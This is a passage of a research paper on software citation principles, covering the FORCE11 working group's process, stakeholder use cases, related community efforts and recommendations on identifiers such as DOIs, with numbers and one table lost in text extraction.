sufficient. additional information such as configurations and platform issues are also needed. process of creating principles the force software citation working group was created in april with the following mission statement: the software citation working group is a cross-team committee leveraging the perspectives from a variety of existing initiatives working on software citation to produce a consolidated set of citation principles in order to encourage broad adoption of a consistent policy for software citation across disciplines and venues. the working group will review existing efforts and make a set of recommendations. these recommendations will be put off for endorsement by the organizations represented by this group and others that play an important role in the community. table varieties of software mentions in publications, from howison & bullard ( ). mention type count (n = ) percentage (%) cite to publication cite to user’s manual cite to name or website instrument-like url in text in-text name only not even name providing recognition of software can have tremendous economic impact as demonstrated by the role of text retrieval conference (trec) in information retrieval (rowe et al., ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the group will produce a set of principles, illustrated with working examples, and a plan for dissemination and distribution. this group will not be producing detailed specifications for implementation although it may review and discuss possible technical solutions. the group gathered members (see appendix a) in april and may , and then began work in june. this materialized as a number of meetings and offline work by group members to document existing practices in member disciplines; gather materials from workshops and other reports; review those materials, identifying overlaps and differences; create a list of use cases related to software citation, recorded in appendix b; and subsequently draft an initial version of this document. the draft software citation principles document was discussed in a day-long workshop and presented at the force conference in april (https://www.force .org/ meetings/force ). members of the workshop and greater force community gave feedback, which we recorded here in appendix c. this discussion led to some changes in the use cases and discussion, although the principles themselves were not modified. we also plan to initiate a follow-on implementation working group that will work with stakeholders to ensure that these principles impact the research process. the process of creating the software citation principles began by adapting the force data citation principles (data citation synthesis group, ). these were then modified based on discussions of the force software citation working group (see appendix a for members), information from the use cases in section use cases, and the related work in section related work. we made the adaptations because software, while similar to data in terms of not traditionally having been cited in publications, is also different than data. in the context of research (e.g., in science), the term “data” usually refers to electronic records of observations made in the course of a research study (“raw data”) or to information derived from such observations by some form of processing (“processed data”), as well as the output of simulation or modeling software (“simulated data”). some confusion about the distinction between software and data comes in part from the much wider scope of the term “data” in computing and information science, where it refers to anything that can be processed by a computer. in that sense, software is just a special kind of data. because of this, citing software is not the same as citing data. a more general discussion about these distinctions is currently underway (https://github.com/ danielskatz/software-vs-data). the principles in this document should guide further development of software citation mechanisms and systems, and the reader should be able to look at any particular example of software citation to see if it meets the principles. while we strive to offer practical guidelines that acknowledge the current incentive system of academic citation, a more modern system of assigning credit is sorely needed. it is not that academic software needs a separate credit system from that of academic papers, but that the need for credit for research software underscores the need to overhaul the system of credit for all research products. one possible solution for a more complete smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.force .org/meetings/force https://www.force .org/meetings/force https://github.com/danielskatz/software-vs-data https://github.com/danielskatz/software-vs-data http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ description of the citations and associated credit is the transitive credit proposed by katz ( ) and katz & smith ( ). use cases we documented and analyzed a set of use cases related to software citation in force software citation working group (https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu) (recorded in appendix b for completeness). table summarizes these use cases and makes clear what the requirements are for software citation in each case. each example represents a particular stakeholder performing an activity related to citing software, with the given metadata as information needed to do that. in that table, we use the following definitions: � “researcher” includes both academic researchers (e.g., postdoc, tenure-track faculty member) and research software engineers. � “publisher” includes both traditional publishers that publish text and/or software papers as well as archives such as zenodo that directly publish software. � “funder” is a group that funds software or research using software. � “indexer” examples include scopus, web of science, google scholar, and microsoft academic search. � “domain group/library/archive” includes the astronomy source code library (ascl; http://ascl.net); biomedical and healthcare data discovery index ecosystem (biocaddie; https://biocaddie.org); computational infrastructure for geodynamics (cig; https://geodynamics.org), libraries, institutional archives, etc. � “repository” refers to public software repositories such as github, netlib, comprehensive r archive network (cran), and institutional repositories. � “unique identifier” refers to unique, persistent, and machine-actionable identifiers such as a doi, ark, or purl. � “description” refers to some description of the software such as an abstract, readme, or other text description. � “keywords” refers to keywords or tags used to categorize the software. � “reproduce” can mean actions focused on reproduction, replication, verification, validation, repeatability, and/or utility. � “citation manager” refers to people and organizations that create scholarly reference management software and websites including zotero, mendeley, endnote, refworks, bibdesk, etc., that manage citation information and semi-automatically insert those citations into research products. all use cases assume the existence of a citable software object, typically created by the authors/developers of the software. developers can achieve this by, e.g., uploading a software release to figshare (https://figshare.com/) or zenodo (github, ) to obtain a doi. necessary metadata should then be included in a citation file (wilson, ) or machine-readable citation.jsonld file (katz & smith, ). when software is not smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu https://docs.google.com/document/d/ ds sqgobifwlb g hilleosaagmdo qpepjyuawcviu http://ascl.net https://biocaddie.org https://geodynamics.org https://figshare.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t a b le u se c a se s a n d b a si c m e ta d a ta re q u ir e m e n ts fo r so ft w a re c it a ti o n , a d a p te d fr o m f o r c e s o ft w a re c it a ti o n w o rk in g g ro u p . s o li d ci rc le s (� ) in d ic a te th a t th e u se ca se d ep en d s o n th a t m et a d a ta , w h il e p lu s si g n s (+ ) in d ic a te th a t th e u se ca se w o u ld b en efi t fr o m th a t m et a d a ta if a v a il a b le . b a si c re q u ir e m e n ts u se c a se u n iq u e id e n ti fi e r s o ft w a re n a m e a u th o r( s) c o n tr ib u to r ro le v e rs io n n u m b e r r e le a se d a te l o c a ti o n / re p o si to r y in d e x e d c it a ti o n s s o ft w a re li ce n se d e sc ri p ti o n k e y w o rd s e x a m p le st a k e h o ld e r( s) . u se so ft w a re fo r a p a p er � � � � � � + + r es ea rc h er . u se so ft w a re in /w it h n ew so ft w a re � � � � � � + + r es ea rc h er , so ft w a re en g in ee r . c o n tr ib u te to so ft w a re � � � + � � � + + r es ea rc h er , so ft w a re en g in ee r . d et er m in e u se / ci ta ti o n s o f so ft w a re � � � r es ea rc h er , so ft w a re en g in ee r . g et cr ed it fo r so ft w a re d ev el o p m en t � � � + � � + r es ea rc h er , so ft w a re en g in ee r . “ r ep ro d u ce ” a n a ly si s � � � � � + + r es ea rc h er . f in d so ft w a re to im p le m en t ta sk � � � � � + + + r es ea rc h er , so ft w a re en g in ee r . p u b li sh so ft w a re p a p er � � � � � � p u b li sh er . p u b li sh p a p er s th a t ci te so ft w a re � � � � � � � p u b li sh er . b u il d ca ta lo g o f so ft w a re � � � � � � � + + + in d ex er . b u il d so ft w a re ca ta lo g /r eg is tr y � � � � + + d o m a in g ro u p , li b ra ry , a rc h iv e . s h o w sc ie n ti fi c im p a ct o f h o ld in g s � � � r ep o si to ry . s h o w h o w fu n d ed so ft w a re h a s b ee n u se d � � � f u n d er , p o li cy m a k er . e v a lu a te co n tr ib u ti o n s o f re se a rc h er � � + � � e v a lu a to r, fu n d er . s to re so ft w a re en tr y � � � � � � + + c it a ti o n m a n a g er . p u b li sh m ix ed d a ta /s o ft w a re p a ck a g es � � � � � � + + + r ep o si to ry , li b ra ry , a rc h iv e smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ freely available (e.g., commercial software) or when there is no clear identifier to use, alternative means may be used to create citable objects as discussed in section access to software. in some cases, if particular metadata are not available, alternatives may be provided. for example, if the version number and release date are not available, the download date can be used. similarly, the contact name/email is an alternative to the location/repository. related work with approximately working group participants (see appendix a) representing a range of research domains, the working group was tasked to document existing practices in their respective communities. a total of documents were submitted by working group participants, with the life sciences, astrophysics, and geosciences being particularly well-represented in the submitted resources. general community/non domain-specific activities some of the most actionable work has come from the uk software sustainability institute (ssi) in the form of blog posts written by their community fellows. for example, in a blog post from , jackson ( ) discusses some of the pitfalls of trying to cite software in publications. he includes useful guidance for when to consider citing software as well as some ways to help “convince” journal editors to allow the inclusion of software citations. wilson ( ) suggests that software authors include a citation file that documents exactly how the authors of the software would like to be cited by others. while this is not a formal metadata specification (e.g., it is not machine readable) this does offer a solution for authors wishing to give explicit instructions to potential citing authors and, as noted in the motivation section (see motivation), there is evidence that authors follow instructions if they exist (huang, rose & hsu, ). in a later post on the ssi blog, jackson gives a good overview of some of the approaches package authors have taken to automate the generation of citation entities such as bibtex entries (jackson, ), and knepley et al. ( ) do similarly. while not usually expressed as software citation principles, a number of groups have developed community guidelines around software and data citation. van de sompel et al. ( ) argue for registration of all units of scholarly communication, including software. in “publish or be damned? an alternative impact manifesto for research software,” chue hong ( ) lists nine principles as part of “the research software impact manifesto.” in the “science code manifesto” (barnes et al., ), the founding signatories cite five core principles (code, copyright, citation, credit, curation) for scientific software. perhaps in light of the broad range of research domains struggling with the challenge of better recognizing the role of software, funders and agencies in both the us (e.g., nsf, nih, alfred p. sloan foundation) and uk (e.g., sftc, jisc, wellcome trust) have sponsored or hosted a number of workshops with participants from across a range of smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ disciplines, specifically aimed at discussing issues around software citation (sufi et al., ; ahalt et al., ; software credit workshop, ; norén, ; software attribution for geoscience applications, ; allen et al., ). in many cases these workshops produced strong recommendations for their respective communities on how best to proceed. in addition, a number of common themes arose in these workshops, including ( ) the critical need for making software more “citable” (and therefore actions authors and publishers should take to improve the status quo), ( ) how to better measure the impact of software (and therefore attract appropriate funding), and ( ) how to properly archive software (where, how, and how often) and how this affects what to cite and when. most notable of the community efforts are those of wssspe workshops (http://wssspe.researchcomputing.org.uk/) and ssi workshops (http://www.software.ac.uk/ community/workshops), who between them have run a series of workshops aimed at gathering together community members with an interest in ( ) defining the set of problems related to the role of software and associated people in research settings, particularly academia, ( ) discussing potential solutions to those problems, ( ) beginning to work on implementing some of those solutions. in each of the three years that wssspe workshops have run thus far, the participants have produced a report (katz et al., ; katz et al., a; katz et al., b) documenting the topics covered. section . and appendix j in the wssspe report (katz et al., b) has some preliminary work and discussion particularly relevant to this working group. in addition, a number of academic publishers such as apa (mcadoo, ) have recommendations for submitting authors on how to cite software, and journals such as f research (http://f research.com/for-authors/ article-guidelines/software-tool-articles), softwarex (http://www.journals.elsevier.com/ softwarex/), open research computation (http://www.openresearchcomputation.com) and the journal of open research software (http://openresearchsoftware.metajnl.com) allow for submissions entirely focused on research software. domain-specific community activities one approach to increasing software “citability” is to encourage the submission of papers in standard journals describing a piece of research software, often known as software papers (see software papers). while some journals (e.g., transactions on mathematical software (toms), bioinformatics, computer physics communications, f research, seismological research letters, electronic seismologist) have traditionally accepted software submissions, the american astronomical society (aas) has recently announced they will accept software papers in their journals (aas editorial board, ). professional societies are in a good position to change their respective communities, as the publishers of journals and conveners of domain-specific conferences; as publishers they can change editorial policies (as aas has done) and conferences are an opportunity to communicate and discuss these changes with their communities. in astronomy and astrophysics: the astrophysics source code library (ascl; http://ascl.net) is a website dedicated to the curation and indexing of software used in the astronomy-based literature. in , the aas and github co-hosted a workshop smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://wssspe.researchcomputing.org.uk/ http://www.software.ac.uk/community/workshops http://www.software.ac.uk/community/workshops http://f research.com/for-authors/article-guidelines/software-tool-articles http://f research.com/for-authors/article-guidelines/software-tool-articles http://www.journals.elsevier.com/softwarex/ http://www.journals.elsevier.com/softwarex/ http://www.openresearchcomputation.com http://openresearchsoftware.metajnl.com http://ascl.net http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (norén, ) dedicated to software citation, indexing, and discoverability in astrophysics. more recently, a birds of a feather session was held at the astronomical data analysis software and systems (adass) xxv conference (allen et al., ) that included discussion of software citation. in the life sciences: in may , the nih held a workshop aimed at helping the biomedical community discover, cite, and reuse software written by their peers. the primary outcome of this workshop was the software discovery index meeting report (white et al., ) which was shared with the community for public comment and feedback. the authors of the report discuss what framework would be required for supporting a software discovery index including the need for unique identifiers, how citations to these would be handled by publishers, and the critical need for metadata to describe software packages. in the geosciences: the ontosoft (gil, ratnakar & garijo, ) project describes itself as “a community software commons for the geosciences.” much attention was given to the metadata required to describe, discover, and execute research software. the nsf-sponsored geo-data workshop (fox & signell, ) revolved around data lifecycle, management, and citation. the workshop report includes many recommendations for data citation. existing efforts around metadata standards producing detailed specifications and recommendations for possible metadata standards to support software citation was not within the scope of this working group. however some discussion on the topic did occur and there was significant interest in the wider community to produce standards for describing research software metadata. content specifications for software metadata vary across communities, and include doap (https://github.com/edumbill/doap/), an early metadata term set used by the open source community, as well as more recent community efforts like research objects (bechhofer et al., ), the software ontology (malone et al., ), edam ontology (ison et al., ), project credit (credit, ), the openrif contribution role ontology (gutzman et al., ), ontosoft (gil, ratnakar & garijo, ), rrr/jisc guidelines (gent, jones & matthews, ), or the terms and classes defined at schema.org related to the https://schema.org/softwareapplication class. in addition, language-specific software metadata schemes are in widespread use, including the debian package format (jackson & schwarz, ), python package descriptions (ward & baxter, ), and r package descriptions (wickham, ), but these are typically conceived for software build, packaging, and distribution rather than citation. codemeta (jones et al., ) has created a crosswalk among these software metadata schemes and an exchange format that allows software repositories to effectively interoperate. discussion in this section we discuss some the issues and concerns related to the principles stated in section software citation principles. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/edumbill/doap/ https://schema.org/ https://schema.org/softwareapplication http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ what software to cite the software citation principles do not define what software should be cited, but rather how software should be cited. what software should be cited is the decision of the author(s) of the research work in the context of community norms and practices, and in most research communities, these are currently in flux. in general, we believe that software should be cited on the same basis as any other research product such as a paper or book; that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers, perhaps following the force data citation working group principles, which state, “in scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited” (data citation synthesis group, ). some software which is, or could be, captured as part of data provenance may not be cited. citation is partly a record of software important to a research outcome , where provenance is a record of all steps (including software) used to generated particular data within the research process. research results, including data, increasingly depend on software (hannay et al., ), and thus may depend on the specific version used (sandve et al., ; wilson et al., ). furthermore, errors in software or environment variations can affect results (morin et al., ; soergel, ). this implies that for a data research product, provenance data will include some of the cited software. similarly, the software metadata recorded as part of data provenance will overlap the metadata recorded as part of software citation for the software that was used in the work. the data recorded for reproducibility should also overlap the metadata recorded as part of software citation. in general, we intend the software citation principles to cover the minimum of what is necessary for software citation for the purpose of software identification. some use cases related to citation (e.g., provenance, reproducibility) might have additional requirements beyond the basic metadata needed for citation, as table shows. software papers currently, and for the foreseeable future, software papers are being published and cited, in addition to software itself being published and cited, as many community norms and practices are oriented towards citation of papers. as discussed in the importance principle ( ) and the discussion above, the software itself should be cited on the same basis as any other research product; authors should cite the appropriate set of software products. if a software paper exists and it contains results (performance, validation, etc.) that are important to the work, then the software paper should also be cited. we believe that a request from the software authors to cite a paper should typically be respected, and the paper cited in addition to the software. derived software the goals of software citation include the linked ideas of crediting those responsible for software and understanding the dependencies of research products on specific software. in the importance principle ( ), we state that “software should be cited on the same basis as any other research product such as a paper or a book; that is, authors should cite citation can be used for many purposes, including for software: which software has been used in the work, which software has influenced the work, which software is the work superseding, which software is the work disproving, etc. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the appropriate set of software products just as they cite the appropriate set of papers.” in the case of one code that is derived from another code, citing the derived software may appear to not credit those responsible for the original software, nor recognize its role in the work that used the derived software. however, this is really analogous to how any research builds on other research, where each research product just cites those products that it directly builds on, not those that it indirectly builds on. understanding these chains of knowledge and credit have been part of the history of science field for some time, though more recent work suggests more nuanced evaluation of the credit chains (credit, ; katz & smith, ). software peer review adherence to the software citation principles enables better peer review through improved reproducibility. however, since the primary goal of software citation is to identify the software that has been used in a scholarly product, the peer review of software itself is mostly out of scope in the context of software citation principles. for instance, when identifying a particular software artifact that has been used in a scholarly product, whether or not that software has been peer-reviewed is irrelevant. one possible exception would be if the peer-review status of the software should be part of the metadata, but the working group does not believe this to be part of the minimal metadata needed to identify the software. citation format in reference list citations in references in the scholarly literature are formatted according to the citation style (e.g., ams, apa, chicago, mla) used by that publication. (examples illustrating these styles have been published by lipson ( ); the follow-on software citation implementation group will provide suggested examples.) as these citations are typically sent to publishers as text formatted in that citation style, not as structured metadata, and because the citation style dictates how the human reader sees the software citation, we recommend that all text citation styles support the following: a) a label indicating that this is software, e.g., [software], potentially with more information such as [software: source code], [software: executable], or [software: container], and b) support for version information, e.g., version . . . citations limits this set of software citation principles, if followed, will cause the number of software citations in scholarly products to increase, thus causing the number of overall citations to increase. some scholarly products, such as journal articles, may have strict limits on the number of citations they permit, or page limits that include reference sections. such limits are counter to our recommendation, and we recommend that publishers using strict limits for the number of citations add specific instructions regarding software citations to their author guidelines to not disincentivize software citation. similarly, publishers should not include references in the content counted against page limits. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unique identification the unique identification principle ( ) calls for “a method for identification that is machine actionable, globally unique, interoperable, and recognized by a community.” what this means for data is discussed in detail in the “unique identification” section of a report by the force data citation implementation group (starr et al., ), which calls for “unique identification in a manner that is machine-resolvable on the web and demonstrates a long-term commitment to persistence.” this report also lists examples of identifiers that match these criteria including dois, purls, handles, arks, and nbns. for software, we recommend the use of dois as the unique identifier due to their common usage and acceptance, particularly as they are the standard for other digital products such as publications. while we believe there is value in including the explicit version (e.g., git sha hash, subversion revision number) of the software in any software citation, there are a number of reasons that a commit reference together with a repository url is not recommended for the purposes of software citation: . version numbers/commit references are not guaranteed to be permanent. projects can be migrated to new version control systems (e.g., svn to git). in addition, it is possible to overwrite/clobber a particular version (e.g., force-pushing in the case of git). . a repository address and version number does not guarantee that the software is available at a particular (resolvable) url, especially as it is possible for authors to remove their content from, e.g., github. . a particular version number/commit reference may not represent a “preferred” point at which to cite the software from the perspective of the package authors. we recognize that there are certain situations where it may not be possible to follow the recommended best-practice. for example, if ( ) the software authors did not register a doi and/or release a specific version, or ( ) the version of the software used does not match what is available to cite. in those cases, falling back on a combination of the repository url and version number/commit hash would be an appropriate way to cite the software used. note that the “unique” in a uid means that it points to a unique, specific software version. however, multiple uids might point to the same software. this is not recommended, but is possible. we strongly recommend that if there is already a uid for a version of software, no additional uid should be created. multiple uids can lead to split credit, which goes against the credit and attribution principle ( ). software versions and identifiers there are at least three different potential relationships between identifiers and versions of software: . an identifier can point to a specific version of a piece of software. . an identifier can point to the piece of software, effectively all versions of the software. . an identifier can point to the latest version of a piece of software. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is possible that a given piece of software may have identifiers of all three types. in addition, there may be one or more software papers, each with an identifier. while we often need to cite a specific version of software, we may also need a way to cite the software in general and to link multiple releases together, perhaps for the purpose of understanding citations to the software. the principles in section software citation principles are intended to be applicable at all levels, and to all types of identifiers, such as dois, rrids, etc., though we again recommend when possible the use of dois that identify specific versions of source code. we note that rrids were developed by the force resource identification initiative (https://www.force .org/group/ resource-identification-initiative) and have been discussed for use to identify software packages (not specific versions), though the force resource identification technical specifications working group (https://www.force .org/group/resource- identification-technical-specifications-working-group) says “information resources like software are better suited to the software citation wg.” there is currently a lack of consensus on the use of rrids for software. types of software the principles and discussion in this document have generally been written to focus on software as source code. however, we recognize that some software is only available as an executable, a container, or a virtual machine image, while other software may be available as a service. we believe the principles apply to all of these forms of software, though the implementation of them will certainly differ based on software type. when software is accessible as both source code and another type, we recommend that the source code be cited. access to software the accessibility principle ( ) states that “software citations should permit and facilitate access to the software itself.” this does not mean that the software must be freely available. rather, the metadata should provide enough information that the software can be accessed. if the software is free, the metadata will likely provide an identifier that can be resolved to a url pointing to the specific version of the software being cited. for commercial software, the metadata should still provide information on how to access the specific software, but this may be a company’s product number or a link to a website that allows the software be purchased. as stated in the persistence principle ( ), we recognize that the software version may no longer be available, but it still should be cited along with information about how it was accessed. what an identifier should resolve to while citing an identifier that points to, e.g., a github repository can satisfy the principles of unique identification ( ), accessibility ( ), and specificity ( ), such a repository cannot guarantee persistence ( ). therefore, we recommend that the software identifier should resolve to a persistent landing page that contains metadata and a link to the software itself, rather than directly to the source code files, repository, or executable. this ensures smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.force .org/group/resource-identification-initiative https://www.force .org/group/resource-identification-initiative https://www.force .org/group/resource-identification-technical-specifications-working-group https://www.force .org/group/resource-identification-technical-specifications-working-group http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ longevity of the software metadata—even perhaps beyond the lifespan of the software they describe. this is currently offered by services such as figshare and zenodo (github, ), which both generate persistent datacite dois for submitted software. in addition, such landing pages can contain both human-readable metadata (e.g., the types shown by table ) as well as content-negotiable formats such as rdf or doap (https://github.com/edumbill/doap/). updates to these principles as this set of software citation principles has been created by the force software citation working group (https://www.force .org/group/software-citation-working- group), which will cease work and dissolve after publication of these principles, any updates will require a different force working group to make them. as mentioned in section future work, we expect a follow-on working group to be established to promote the implementation of these principles, and it is possible that this group might find items that need correction or addition in these principles. we recommend that this software citation implementation working group be charged, in part, with updating these principles during its lifetime, and that force should listen to community requests for later updates and respond by creating a new working group. future work software citation principles without clear worked-through examples are of limited value to potential implementers, and so in addition to this principles document, the final deliverable of this working group will be an implementation paper outlining working examples for each of the use cases listed in section use cases. following these efforts, we expect that force will start a new working group with the goals of supporting potential implementers of the software citation principles and concurrently developing potential metadata standards, loosely following the model of the force data citation working group. beyond the efforts of this new working group, additional effort should be focused on updating the overall academic credit/citation system. appendix a working group membership alberto accomazzi, harvard-smithsonian cfa alice allen, astrophysics source code library micah altman, mit jay jay billings, oak ridge national laboratory carl boettiger, university of california, berkeley jed brown, university of colorado boulder sou-cheng t. choi, norc at the university of chicago & illinois institute of technology neil chue hong, software sustainability institute smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/edumbill/doap/ https://www.force .org/group/software-citation-working-group https://www.force .org/group/software-citation-working-group http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tom crick, cardiff metropolitan university mercè crosas, iqss, harvard university scott edmunds, gigascience, bgi hong kong christopher erdmann, harvard-smithsonian cfa martin fenner, datacite darel finkbeiner, osti ian gent, university of st andrews, recomputation.org carole goble, the university of manchester, software sustainability institute paul groth, elsevier labs melissa haendel, oregon health and science university stephanie hagstrom, force robert hanisch, national institute of standards and technology, one degree imager edwin henneken, harvard-smithsonian cfa ivan herman, world wide web consortium (w c) james howison, university of texas lorraine hwang, university of california, davis thomas ingraham, f research matthew b. jones, nceas, university of california, santa barbara catherine jones, science and technology facilities council daniel s. katz, university of illinois (co-chair) alexander konovalov, university of st andrews john kratz, california digital library jennifer lin, public library of science frank löffler, louisiana state university brian matthews, science and technology facilities council abigail cabunoc mayes, mozilla science lab daniel mietchen, national institutes of health bill mills, triumf evan misshula, cuny graduate center august muench, american astronomical society fiona murphy, independent researcher lars holm nielsen, cern kyle e. niemeyer, oregon state university (co-chair) karthik ram, university of california, berkeley fernando rios, johns hopkins university ashley sands, university of california, los angeles soren scott, independent researcher smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frank j. seinstra, netherlands escience center arfon smith, github (co-chair) kaitlin thaney, mozilla science lab ilian todorov, science and technology facilities council matt turk, university of illinois miguel de val-borro, princeton university daan van hauwermeiren, ghent university stijn van hoey, ghent university belinda weaver, the university of queensland nic weber, university of washington ischool appendix b software citation use cases this appendix records an edited, extended description of the use cases discussed in section use cases, originally found in force software citation working group. this discussion is not fully complete, and in some cases, it may not be fully self-consistent, but it is part of this paper as a record of one of the inputs to the principles. we expect that the follow-on software citation implementation group will further develop these use cases, including explaining in more detail how the software citation principles can be applied to each as part of working with the stakeholders to persuade them to actually implement the principles in their standard workflows. researcher who uses someone else’s software for a paper one of the most common use cases may be researchers who use someone else’s software and want to cite it in a technical paper. this will be similar to existing practices for citing research artifacts in papers. “requirements” for researcher: � name of software � names of software authors/contributors � software version number and release date, or download date � location/repository, or contact name/email (if not publicly available) � citable doi of software � format for citing software in text and in bibliography possible steps: . software developers create citation file and associate with source code release/ repository. . researcher finds and uses software for research paper. . researcher identifies citation metadata file (e.g., “citation” file) associated with downloaded/installed software source code or in online repository/published location. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software appropriately, e.g., in methodology section; reference included in bibliography. researcher who uses someone else’s software for new software in this case, a researcher develops new software that incorporates or depends on existing software. in order to credit the developer(s), the researcher will include citations in his/her source code, documentation, or other metadata in a similar manner to papers. requirements for researcher: � name of software � names of software authors/contributors � software version number and release date � location/repository � citable doi of software � format for citing software in source code, documentation, or citation metadata file possible steps: . assume that software developers have created a citation file and associated with the source code release/repository. . researcher finds and uses software in the development of new software. . researcher identifies citation metadata file (e.g., “citation” file) associated with downloaded/installed software source code or in online repository/published location. citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software in source code, documentation, or other metadata- containing file. researcher who contributes to someone else’s software (open source project) a researcher wants to contribute to someone else’s software in the manner in which their contributions will be accepted and recognized. possible steps: . researcher finds information about the software, and how contributors will be recognized . researcher possibly submit a contributor license agreement (cla) or copyright assignment agreement (caa) to allow the contributed content to be distributed with the software being contributed to . researcher contributes to the software . software maintainers accept contribution, recognize researcher’s contribution, and update the software metadata as appropriate smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ researcher who wants to know who uses the researcher’s software this case is similar to a researcher who wants to find other papers/publications that cite a particular paper. a researcher wants to gauge the usage of her software within or across communities and measure its impact on research for both credit and funding. requirements: � uniquely identify software � indexed citations of software � indexed papers that use software steps: . researcher finds software official name or unique doi in metadata associated with downloaded/installed source code or in online repository/published location. . researcher searches for software, may use online indexer (e.g., scopus, web of science, google scholar) using software name or doi. . online indexer presents entry for software with list of citations, if any. ideally, entry will also include metadata contained in software citation file and citation example. researcher gets credit for software development at the academic/governmental institution, in professional career, etc this case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. requirements for researcher: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in an official cv, in a departmental/institutional review report, etc. � role in the software creation, that is linked to version or component � role in contributing to the software as a “package” (not just lines of code) development of benchmarks, testing, documentation, tutorials etc. researcher who wants to “reproduce” another person/group’s analysis when a researcher wants to understand or verify a research results from another researcher, they would like to use the same software. note that accessing the exact same software is necessary but not sufficient for reproducibility. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirements for researcher: � name of software � location/repository for the exact release that was used � doi or other persistent handle for that specific release � release has all components necessary for reproducing the work (note: this ideally also means sample inputs and outputs) researcher who wants to find a piece of software to implement a task this is the case where a research is looking for software to use but wants to understand whether it is being used in a scholarly fashion. for example, a researcher searches through a software repository and finds a package that might be useful. they look to find whether it has been used by others in the scientific literature. requirements: � either the software documentation page has a reference to existing literature that makes use of it. � there is a mechanism to look it up. publisher wants to publish a software paper this case asks what information regarding software is needed for a publisher who wants to publish a paper describing that software. requirements: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in jats, for example, as well as references in the text itself publisher who wants to publish papers that cite software this case asks what information regarding software is needed for a publisher who wants to publish papers that cite that software. requirements for publisher: � name of software � names of software authors/contributors � location/repository � citable doi of software � format for citing software in, e.g., jats, as well as references in the text itself smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ indexer (e.g., scopus, wos, scholar, ms academic search) who wants to build a catalog of software provide an index over the software that is used within the research domain. track how that software is being used by different groups of researchers and to what ends. requirements: � uniquely identify pieces of software used by the research literature � connect authors and organizations to that software � connect various software versions together domain group (e.g., ascl, biocaddie), libraries, and archives (e.g., university library, laboratory archive, etc.) wants to build a catalog/registry of institutional or domain software there are two different examples here: one is building a catalog/archive of software produced by those affiliated with the institution. the other is along the lines of sayeed choudhury’s note that “data are the new special collections.” an institution may choose to build a catalog/archive of many things within a single topic or subject in order to secure all the software on a certain topic or build a collection that may draw users to their establishment, much like special collections now do for university libraries and archives. repository showing scientific impact of holdings a repository that archives and/or maintains a collection of software. the repository would like to address usage and impact of software in its holding. usage would aid potential users whether the software is being actively maintained or developed or has been superseded. both would help repository know how to direct resources, e.g., maintenance, training etc. this is similar to the case of a funder wanting to know the impact of funded work. requirements: � code name, or a unique identifier � relationships to previous versions � connect to repository � connect to research funder who wants to know how software they funded has been used this use case is similar to “repository showing scientific impact of holdings”, where a funder wants to find out the use and impact and software that they supported. it is also similar to “researcher who wants to know who uses the researcher’s software.” evaluator or funder wants to evaluate contributions of a researcher in this use case, an evaluator (e.g., academic administrator) or funder wants to evaluate the contributions of a researcher who develops software. this case is related to those smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where researchers want to get credit for software development, or where organizations want to evaluate the impact of software itself. reference management system used by researchers to author a manuscript reference management systems may need to be updated to internally understand that their is a software reference type, and to be able to output references to software in common formats. requirements for reference manager: � names of software authors/contributors � software version number and release date � location/repository � citable doi of software or paper recommended for citation � format for citing software in citation metadata file � citation metadata tags embedded in doi landing page/software project page for easy ingest possible steps: . reference management system such as endnote, mendeley, zotero, etc. builds affordances for software references. . researcher finds software citation and adds it to their reference manager library, by (a) importing from the citation file (e.g., bibtex, ris), or (b) clicking on, e.g., an “add to zotero library” widget in web browser. . researcher writes a paper and uses the reference manager to generate citations or bibliography. repository wants to publish mixed data/software packages domain and institutional data repositories have both data and software artifacts, and want to link these together in a provenance trace that can be cited. sometimes the software is a separately identified artifact, but at other times software is included inside of data packages, and the researcher wants to cite the combined product. use cases not adopted in the table researcher who 